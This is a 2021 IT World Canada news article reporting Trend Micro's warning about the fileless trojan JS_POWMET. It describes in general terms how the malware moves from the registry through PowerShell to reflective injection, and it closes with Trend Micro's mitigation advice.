Friday, June 25, 2021

Be on the lookout for fileless malware, warns Trend Micro

Infosec pros spend most of their time dealing with the usual threats that pop up on networks every day. Attackers, on the other hand, spend their time figuring out new ways to evade detection. One of the newest is fileless malware, designed to evade sandbox defences looking for signatures.

Trend Micro has detected a example of this new threat, which, while in itself doesn’t have much impact, is a warning of what’s coming.

The security vendor dubs this particular trojan JS_POWMET. The attack starts by infecting the Windows Registry –Trend Micro suspects the trojan is downloaded by users that visit malicious sites or as a file that is dropped by other malware — which adds an autostart registry entry. That pulls in JS_POWMET from a command and control server. The registry alternation allows the executing arbitrary scripts without saving the XML file on the machine.

Once JS_POWMET is executed, it will then download another file, TROJ_PSINJECT, a Powershell script that runs under the process of Powershell. TROJ_PSINJECT will connect to a website to download a normal file called favicon. That file will then be decrypted and injected into its process using ReflectivePELoader, which is used for injecting EXE/DLL files.

Figure 1

(Trend Micro graphic)

A number of routines end up being executed by the malware using PowerShell commands. Among other things the malware gathers system information including administrator privileges, Root Volume Serial Number, operating system version and IP address. But Trend Micro warns that the JS_POWMET authors can easily add more malware.

Trend Micro says one of the more effective methods for mitigating fileless malware is to limit access to critical infrastructure via container-based systems that separate endpoints from the most important parts of the network. For this specific malware look into disabling Powershell itself if it is clear other Windows components don’t need it.

(For more thoughts about PowerShell see this story)

“Organizations and users should always look beyond the obvious malware files and always be on the lookout for “stealthy” malware that manages to slip into the system virtually unnoticed,” the vendor warns.

Would you recommend this article?

0
0

Share

Thanks for taking the time to let us know what you think of this article!
We'd love to hear your opinion about this or any other story you read in our publication. Click this link to send me a note →

Jim Love, Chief Content Officer, IT World Canada
Howard Solomon
Howard Solomon
Currently a freelance writer, I'm the former editor of ITWorldCanada.com and Computing Canada. An IT journalist since 1997, I've written for several of ITWC's sister publications including ITBusiness.ca and Computer Dealer News. Before that I was a staff reporter at the Calgary Herald and the Brampton (Ont.) Daily Times. I can be reached at hsolomon [@] soloreporter.com

Related Tech News